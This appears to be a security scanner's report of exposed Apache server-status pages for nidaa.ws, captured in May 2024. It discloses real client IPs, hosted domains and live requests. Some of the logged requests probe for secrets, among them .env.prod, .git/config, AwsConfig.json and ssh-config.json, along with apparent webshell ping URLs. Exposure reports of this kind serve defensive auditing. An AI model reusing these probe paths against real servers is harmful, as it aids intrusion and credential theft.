      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5240290/204/3934_
      17.0774531916210.07.83589.08
      176.224.66.37http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-5240290/119/3309_
      17.01154216125460.06.70438.98
      199.244.88.218http/1.1white-petals.com:80GET / HTTP/1.1
      
      0-5240290/159/3655_
      17.0931015912830.032.29475.52
      54.36.148.229http/1.1wahjcm.com:443GET /build/assets/style.ba73873d.css HTTP/1.1
      
      0-5240290/117/3514_
      16.8014220347483770.06.69417.77
      27.115.124.34http/1.1
      
      0-5240290/110/3605_
      16.97170626829100.065.83620.28
      172.71.114.165http/1.1qr.brunch.ws:443GET /storage/food_image/17162858593789_homemadeicedtea.jpg HTTP
      
      0-5240290/110/3385R
      16.91173229723480.019.76440.32
      188.53.62.4http/1.1
      
      0-5240290/141/3603_
      17.03129125153110.059.35485.51
      5.245.111.196http/1.1albayan.edu.sa:443GET /imgweb/file44/71%20%D8%AA%D8%A7%D8%A8%D8%B9%20%D8%AF%D9%84
      
      0-5240291/131/3417K
      17.1202237672118.021.93564.89
      46.251.137.226http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/skin.min.css HTTP/1.1
      
      0-5240290/106/3938_
      16.98170529935240.020.95619.41
      172.71.114.56http/1.1qr.brunch.ws:443GET /storage/food_image/17162860567415_americancoffee.jpg HTTP/
      
      0-5240290/114/3596_
      17.02146125098740.010.64464.40
      178.73.109.130http/1.1albayan.edu.sa:443GET /apple-touch-icon-precomposed.png HTTP/1.1
      
      0-5240290/128/3144_
      16.991698223426530.06.17442.13
      172.71.115.24http/1.1qr.brunch.ws:443GET /storage/food_image/17162864494425_frenchlatteaulatte.jpg H
      
      0-5240290/180/3955_
      17.01163221030420.06.54358.76
      172.70.175.119http/1.1support.daaris.com:443GET /templates/new/assets/css/colors/green.css HTTP/1.1
      
      0-5240290/147/3621_
      17.10163532418960.07.67745.38
      138.197.191.87http/1.1trynidaa.com:443GET /server HTTP/1.1
      
      0-5240290/149/3609_
      17.110222452580.010.44611.43
      172.69.195.79http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-5240290/181/3767_
      17.05108233568290.09.54458.60
      176.224.46.254http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-5240290/124/3387_
      17.069343816673150.08.45550.57
      95.186.101.230http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%A3%D8%B3%
      
      0-5240290/151/3307_
      17.02140120331580.08.63605.93
      66.249.70.163http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-5240290/103/3482_
      17.11153521768420.03.85498.15
      45.61.60.197http/1.13dvi.com:443GET /wp-includes/css/dist/customize-widgets/wp-22.php?bction=pi
      
      0-5240290/99/3713_
      17.07611818794380.023.63537.68
      45.61.60.197http/1.13dvi.com:443GET /wp-includes/blocks/tag-cloud/wp-22.php?bction=ping HTTP/1.
      
      0-5240290/140/3547_
      17.11711327434180.04.71427.94
      191.98.133.194http/1.1sulaimaniya.edu.sa:80POST /xmlrpc.php HTTP/1.1
      
      0-5240290/125/3492_
      16.97170625995600.016.05445.93
      172.71.114.153http/1.1qr.brunch.ws:443GET /storage/food_image/17096787609046_sweetmelon.webp HTTP/1.1
      
      0-5240290/119/3524_
      17.03123517438320.07.09469.45
      154.54.249.208http/1.1albayan.edu.sa:443GET /e_sch/code/forum/db.php?j=3&q=368&t=217.113.194.243&c=5 HT
      
      0-5240290/131/3529_
      17.0838324723400.05.88498.22
      176.224.66.37http/1.1albayan.edu.sa:443GET /js/jquery-1.3.2.js HTTP/1.1
      
      0-5240290/116/3641_
      17.10174018189820.053.28485.43
      138.197.191.87http/1.1trynidaa.com:443GET /.DS_Store HTTP/1.1
      
      0-5240290/103/3716_
      16.9118420547760.049.25658.75
      138.197.191.87http/1.1
      
      1-5277640/88/3166_
      14.78170538034010.040.83620.80
      172.71.114.50http/1.1qr.brunch.ws:443GET /storage/food_image/17096789003777_struwberry.webp HTTP/1.1
      
      1-5277640/134/3451_
      14.62116230412870.05.81472.30
      178.73.109.130http/1.1
      
      1-5277640/129/3662_
      14.41164524669860.030.87582.05
      159.0.8.113http/1.1
      
      1-5277640/89/3393_
      14.90655523879870.03.37524.76
      45.61.60.197http/1.13dvi.com:443GET /wp-includes/blocks/table/wp-22.php?bction=ping HTTP/1.1
      
      1-5277640/78/3354_
      14.851244025474000.05.00467.83
      45.61.60.197http/1.13dvi.com:443GET /wp-includes/blocks/query/wp-22.php?bction=ping HTTP/1.1
      
      1-5277641/106/3240K
      14.960118210410.84.98426.18
      141.101.98.199http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      1-5277640/178/3408_
      14.93153328374150.020.16478.08
      138.197.191.87http/1.1trynidaa.com:443GET /login.action HTTP/1.1
      
      1-5277640/97/3410_
      14.8412926925824290.07.71463.98
      5.245.111.196http
      Found on 2024-05-28 16:05
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7076b97e5

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 27-May-2024 19:41:10 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  4 days 15 hours 36 minutes 20 seconds
      Server load: 0.29 0.47 0.49
      Total accesses: 643783 - Total Traffic: 92.2 GB - Total Duration: 681326204
      CPU Usage: u503.57 s67.06 cu2533.76 cs556.61 - .911% CPU load
      1.6 requests/sec - 240.5 kB/second - 150.1 kB/request - 1058.32 ms/request
      20 requests currently being processed, 0 workers gracefully restarting, 230 idle workers
      ____________K________K______K_______________________________R___
      _____K_________________K_______K____________________R_____W_____
      __K__________K__________K________W________R__________K____K_____
      _____________K____________R__________________R_K__________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4221720/427/3086_
      57.58121329092480.0152.57530.11
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1716827948.79337596893310546875
      
      0-4221720/440/2722_
      57.09877014887010.031.86402.33
      37.111.239.45http/1.1
      
      0-4221720/528/2957_
      57.48356013359960.043.53358.08
      52.167.144.211http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?user=web&i_f=1627&l_n=1&page=1 HTTP
      
      0-4221720/540/2995_
      57.57165088443110.074.40353.51
      52.167.144.238http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?user=web&i_f=1024&l_n=1&page=1 HTTP
      
      0-4221720/456/3017_
      57.533219009424205030.088.14436.02
      2.90.65.132http/1.1albayan.edu.sa:443GET /images/slider/03.jpg HTTP/1.1
      
      0-4221720/437/2737_
      57.5426592026432820.028.97393.66
      49.42.55.88http/1.1albayan.edu.sa:443GET /imgweb/QUESTION%20BANK-7th.pdf HTTP/1.1
      
      0-4221720/514/2994_
      57.53317322699400.087.02396.99
      2.90.100.107http/1.1albayan.edu.sa:443GET /imgweb/1445/sc3.pdf HTTP/1.1
      
      0-4221720/454/2759_
      57.46424017924320.0105.90474.70
      51.39.215.196http/1.1albayan.edu.sa:443GET /web/images/logo_school.png HTTP/1.1
      
      0-4221720/477/3403_
      57.6173128309060.020.81554.70
      45.95.232.245http/1.1alnwisher.com:443GET /AwsConfig.json HTTP/1.1
      
      0-4221720/460/2923_
      57.53303017401240.029.69423.53
      66.249.64.10http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?user=web&i_f=1697&page=1 HTTP/1.1
      
      0-4221720/374/2550_
      57.571780215872360.018.30386.13
      142.154.111.67http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-4221720/432/3278_
      57.6266219449850.063.92310.55
      45.95.232.245http/1.1alnwisher.com:443GET /ssh-config.json HTTP/1.1
      
      0-4221722/455/2989K
      57.643222876965.456.07554.05
      93.112.172.122http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-4221720/471/2962_
      57.351571606619087410.0118.01496.40
      13.91.165.237http/1.1
      
      0-4221720/436/3074_
      57.581477626263890.0104.52399.45
      52.167.144.211http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1024&l_n=1&page=1 HTTP
      
      0-4221720/447/2787_
      57.60911512315070.058.51505.63
      45.95.232.245http/1.1alnwisher.com:443POST / HTTP/1.1
      
      0-4221720/362/2709_
      57.55193012393030.020.40462.48
      52.167.144.211http/1.1albayan.edu.sa:80GET /imgweb/file43/8th%20BS%20Unit%201-5.pdf HTTP/1.1
      
      0-4221720/355/2855_
      57.6269119822780.057.45446.77
      45.95.232.245http/1.1alnwisher.com:443GET /ws-config.json HTTP/1.1
      
      0-4221720/440/3105_
      57.5995217173890.066.95416.55
      45.95.232.245http/1.1alnwisher.com:443GET /.env.prod HTTP/1.1
      
      0-4221720/395/2915_
      57.552311023441120.060.02308.62
      2.90.132.140http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-4221720/481/2919_
      57.561863824604580.085.85400.35
      64.227.70.2http/1.1php.we3dvi.com:80\x16\x03\x01
      
      0-4221721/519/2944K
      57.640114810410.832.02397.53
      162.158.94.180http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-4221720/394/2817_
      57.6327218418200.023.95459.11
      31.167.85.106http/1.1albayan.edu.sa:443GET /web/images/logo_school.png HTTP/1.1
      
      0-4221720/454/2976_
      57.6357114949170.040.52396.49
      45.95.232.245http/1.1alnwisher.com:443GET /parameters.yml HTTP/1.1
      
      0-4221720/367/3138_
      57.47423218466080.085.96562.54
      2.90.65.132http/1.1albayan.edu.sa:443GET /imgweb/5/icon%20downlode.jpg HTTP/1.1
      
      1-4222000/403/2682_
      55.0498230055690.024.29494.22
      37.111.239.45http/1.1
      
      1-4222000/478/2847_
      55.03150429861160.026.33438.16
      82.167.12.205http/1.1
      
      1-4222000/472/2895_
      55.22241119558040.0101.83490.24
      66.249.64.14http/1.1albayan.edu.sa:443GET /imgweb/files40/tawheed3-2nd.pdf HTTP/1.1
      
      1-4222001/442/2666K
      55.3113201774766.854.15396.90
      172.70.250.243http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-4222000/320/2788_
      55.20392014885430.084.71401.43
      54.36.148.75http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=915&t=54.36.150.140&c=5 HTTP/
      
      1-4222000/468/2612_
      55.3153213953060.036.88321.50
      45.95.232.245http/1.1alnwisher.com:443GET / HTTP/1.1
      
      1-4222000/520/2711_
      55.213499003817011630.072.49389.39
      2.90.65.132http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/________2_4.png HTT
      
      1-4222000/397/2718_
      55.19413017130570.052.31425.15
      2.90.65.132http/1.1albayan.edu.sa:44
      Found on 2024-05-27 16:41
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7ea097b4a

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 27-May-2024 19:13:41 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  4 days 15 hours 8 minutes 51 seconds
      Server load: 0.37 0.48 0.47
      Total accesses: 641623 - Total Traffic: 91.7 GB - Total Duration: 678542393
      CPU Usage: u492.34 s64.52 cu2533.76 cs556.61 - .912% CPU load
      1.6 requests/sec - 240.2 kB/second - 149.8 kB/request - 1057.54 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 241 idle workers
      ____________________K_____K___________________________________K_
      _________________K___________________________________________K__
      _________________________W______________________________________
      K________________K_______R________________________________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4221720/422/3081_
      55.831857529082990.0146.76524.29
      104.234.204.32http/1.1jawad.com.sa:443GET /files/.git/config HTTP/1.1
      
      0-4221720/427/2709_
      55.80271214874460.031.29401.76
      141.164.168.224http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-4221720/526/2955_
      55.9462113359820.043.52358.06
      95.108.213.175http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-4221720/514/2969_
      55.831856488374930.071.09350.21
      104.234.204.32http/1.1jawad.com.sa:443GET /content/.git/config HTTP/1.1
      
      0-4221720/442/3003_
      55.89115022372640.087.31435.19
      54.36.148.67http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=5&q=164&t=54.36.149.17&c=5 HTTP/
      
      0-4221720/432/2732_
      55.7825126413320.027.98392.67
      3.215.200.136http/1.1
      
      0-4221720/484/2964_
      55.9384422686220.086.21396.18
      141.164.168.224http/1.1albayan.edu.sa:443GET /images/slider/05.jpg HTTP/1.1
      
      0-4221720/447/2752_
      55.89120117923090.0105.69474.50
      145.82.225.28http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/shad_rhs.png HTTP/
      
      0-4221720/473/3399_
      55.8221418928306740.020.78554.67
      94.49.198.212http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-4221720/453/2916_
      55.7834522917398590.029.36423.20
      35.243.23.199http/1.1zed.sa:80GET /wp-includes/js/mediaelement/mediaelement-and-player.min.js
      
      0-4221720/359/2535_
      55.502799215768800.017.39385.22
      51.253.171.86http/1.1
      
      0-4221720/429/3275_
      55.8518516719449740.063.91310.54
      104.234.204.32http/1.1jawad.com.sa:443GET /beta/.git/config HTTP/1.1
      
      0-4221720/404/2938_
      55.86161322748420.054.40552.37
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1716826259.86807894706726074218
      
      0-4221720/467/2958_
      55.80235218586820.060.91439.30
      94.49.198.212http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-4221720/430/3068_
      55.841856226227090.0103.75398.68
      104.234.204.32http/1.1jawad.com.sa:443GET /private/.git/config HTTP/1.1
      
      0-4221720/432/2772_
      55.851858912303050.056.48503.59
      104.234.204.32http/1.1jawad.com.sa:443GET /scripts/.git/config HTTP/1.1
      
      0-4221720/357/2704_
      55.56296212377750.018.46460.54
      64.226.90.99http/1.1
      
      0-4221720/345/2845_
      55.8518512719741360.056.97446.29
      104.234.204.32http/1.1jawad.com.sa:443GET /config/.git/config HTTP/1.1
      
      0-4221720/433/3098_
      55.841855317172540.066.78416.38
      104.234.204.32http/1.1jawad.com.sa:443GET /log/.git/config HTTP/1.1
      
      0-4221720/379/2899_
      55.9445323437510.059.42308.01
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1716826375.57266998291015625000
      
      0-4221721/477/2915K
      55.950124602700.885.78400.27
      172.69.150.47http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-4221720/516/2941_
      55.8518418314810330.032.01397.52
      104.234.204.32http/1.1jawad.com.sa:443GET /wp-includes/js/.git/config HTTP/1.1
      
      0-4221720/387/2810_
      55.85160918410710.023.80458.96
      31.166.121.145http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-4221720/449/2971_
      55.8518414914948600.040.49396.47
      104.234.204.32http/1.1jawad.com.sa:443GET /var/.git/config HTTP/1.1
      
      0-4221720/364/3135_
      55.73129118450230.080.35556.92
      101.198.0.156http/1.1
      
      1-4222000/398/2677_
      53.692961930030940.024.13494.06
      64.226.90.99http/1.1
      
      1-4222001/466/2835K
      54.030129759370.825.92437.76
      172.68.193.149http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      1-4222000/465/2888_
      54.0226019540390.0100.65489.06
      66.249.64.9http/1.1albayan.edu.sa:80GET /albayan_library/index.php HTTP/1.1
      
      1-4222000/432/2656_
      53.9811940920175150.053.66396.42
      145.82.225.28http/1.1albayan.edu.sa:443GET /images/slider/02.jpg HTTP/1.1
      
      1-4222000/316/2784_
      54.0246138014883810.084.68401.40
      95.185.111.169http/1.1albayan.edu.sa:443GET /imgweb/file44/WBs%20on%20Site%2022-23/7th/7th%20BS-T%201-2
      
      1-4222000/460/2604_
      53.94160213951140.036.84321.45
      31.166.121.145http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/________%20________
      
      1-4222000/517/2708_
      53.9318518715208360.072.29389.19
      104.234.204.32http/1.1jawad.com.sa:443GET /components/.git/config HTTP/1.1
      
      1-4222000/386/2707_
      53.921858117125730.051.56424.40
      104.234.204.32http/1.1jawad.com.sa:443GET /repository/.git/config HTTP/1.1
      
      
      Found on 2024-05-27 16:13
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7bd958d40

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 26-May-2024 23:29:05 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  3 days 19 hours 24 minutes 15 seconds
      Server load: 0.50 0.46 0.40
      Total accesses: 533347 - Total Traffic: 76.9 GB - Total Duration: 591495630
      CPU Usage: u301.88 s37.91 cu2211.63 cs479.04 - .921% CPU load
      1.62 requests/sec - 245.0 kB/second - 151.1 kB/request - 1109.03 ms/request
      17 requests currently being processed, 0 workers gracefully restarting, 183 idle workers
      __________K_____________KK___________K__________________________
      _K_________.........................K_________________K_______K_
      __K___________________..........................................
      ........____W______RW______________WK____R______________________
      ____K_________K____.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-235250/207/2583_
      24.4615222222000.034.97340.12
      5.111.242.43http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-235250/133/2204_
      24.2419972814128210.034.85367.97
      138.68.129.241http/1.1zed.sa:443POST /wp-login.php HTTP/1.1
      
      0-235250/196/2325_
      24.271273911808430.011.29310.15
      141.101.97.85http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-235250/149/2344_
      24.4456087286960.018.23274.28
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-235250/137/2411_
      24.193107220864580.037.86342.20
      92.118.39.244http/1.13dvi.com:443GET / HTTP/1.1
      
      0-235250/185/2218_
      24.251562121616130.071.12358.93
      162.158.129.141http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-235250/230/2407_
      24.20274021044880.072.77306.95
      54.36.149.83http/1.1albayan.edu.sa:80GET /robots.txt HTTP/1.1
      
      0-235250/182/2240_
      24.22252113724180.010.82320.82
      54.250.33.123http/1.1alnwisher.com:80GET /Othman6U/PDF.jpg HTTP/1.1
      
      0-235250/231/2820_
      24.4456427007520.089.25525.75
      199.47.82.18http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?c=5&j=2&q=1444&t=199.47.82.18 HTTP/
      
      0-235250/207/2417_
      24.1732823716844740.015.71388.96
      176.18.68.155http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-235251/178/2104K
      24.4600215020000.810.45364.50
      172.68.194.187http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-235250/177/2729_
      24.14357018147780.08.94234.37
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-235250/150/2481_
      24.26137421486230.049.46459.24
      141.164.184.44http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-235250/147/2431_
      24.22258310892690.024.34346.04
      149.109.120.217http/1.1albayan.edu.sa:443GET /e_sch/css/style.css HTTP/1.1
      
      0-235250/186/2550_
      24.202972923525740.015.40290.05
      92.118.39.244http/1.13dvi.com:443GET //www.3dvi.net/js/owl.carousel.min.js HTTP/1.1
      
      0-235250/231/2207_
      24.4524110838760.028.66441.36
      66.249.70.163http/1.1albayan.edu.sa:443GET /imgweb/files41/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D9%84%D8%
      
      0-235250/169/2233_
      24.23229418857610.029.68437.07
      141.101.97.84http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-235250/256/2357_
      24.18321518181090.019.49384.32
      172.71.130.32http/1.1qr.brunch.ws:443GET /storage/food_image/17167550166186_photo20200714133609.jpg 
      
      0-235250/184/2612_
      24.15338214033530.026.17346.33
      5.163.64.5http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-235250/231/2480_
      24.14365122111230.011.81247.60
      94.99.39.251http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-235250/161/2357_
      24.11374278121480210.084.31311.94
      188.64.206.212http/1.1albayan.edu.sa:443GET /imgweb/qb40/31/log11.pdf HTTP/1.1
      
      0-235250/136/2291_
      24.20301112029120.032.65327.88
      51.39.213.225http/1.1albayan.edu.sa:443GET /e_sch/css/images/pause.png HTTP/1.1
      
      0-235250/127/2306_
      24.17324115713380.077.44430.21
      94.99.39.251http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-235250/215/2388_
      24.27107112108390.059.47342.33
      199.47.82.18http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-235251/184/2707K
      24.463317363160.921.58436.15
      66.249.64.9http/1.1hawsab.me:80GET /?zei1221ehxcgw526.html HTTP/1.1
      
      1-235561/161/2211K
      24.190128610800.864.98446.70
      162.158.95.40http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      1-235560/161/2284_
      23.993237028478020.058.05386.67
      162.158.129.114http/1.1qr.brunch.ws:443GET /foods HTTP/1.1
      
      1-235560/144/2328_
      24.03258013492890.09.12383.52
      149.109.120.217http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      1-235560/148/2159_
      24.14687317445430.045.85337.38
      34.253.224.233http/1.1albayan.edu.sa:443GET /web/250.html2 HTTP/1.1
      
      1-235560/207/2370_
      24.1521413267750.050.61312.59
      5.111.242.43http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      1-235560/194/2081_
      24.0822923212671260.015.50269.71
      110.154.100.131http/1.1sulaimaniya.edu.sa:443GET /%d8%a7%d9%84%d8%b9%d8%b4%d8%b1-%d8%a7%d9%84%d8%a3%d9%88%d8
      
      1-235560/139/2117_
      24.131306412263450.012.96277.91
      172.70.247.185http/1.1qr.brunch.ws:443GET /themes HTTP/1.1
      
      1-235560/208/2249_
      23.9440521216062240.065.70367.19
      157.55.39.60http/1.1a
      Found on 2024-05-26 20:29
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df750b38a0f

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 26-May-2024 18:59:08 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  3 days 14 hours 54 minutes 18 seconds
      Server load: 0.33 0.38 0.40
      Total accesses: 504713 - Total Traffic: 71.7 GB - Total Duration: 528941609
      CPU Usage: u203.07 s18.95 cu2178.6 cs471.26 - .918% CPU load
      1.61 requests/sec - 240.3 kB/second - 148.9 kB/request - 1048 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 217 idle workers
      _______________________K________________________W_______________
      __K______________________________K_____________K________________
      ____________K__________________________________.................
